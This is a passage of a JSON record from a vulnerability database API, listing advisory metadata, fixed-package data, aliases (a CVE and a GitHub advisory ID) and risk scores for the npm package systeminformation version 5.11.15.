"https://github.com/sebhildebrandt/systeminformation/security/advisories/GHSA-wphj-fx3q-84ch" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/73014?format=api", "purl": "pkg:npm/systeminformation@5.27.14", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-2rnv-d3tb-hug9" }, { "vulnerability": "VCID-kg9c-n3a4-9uh1" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/systeminformation@5.27.14" } ], "aliases": [ "CVE-2025-68154", "GHSA-wphj-fx3q-84ch" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-wd8e-yyex-vqff" } ], "fixing_vulnerabilities": [], "risk_score": null, "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/systeminformation@5.11.15" }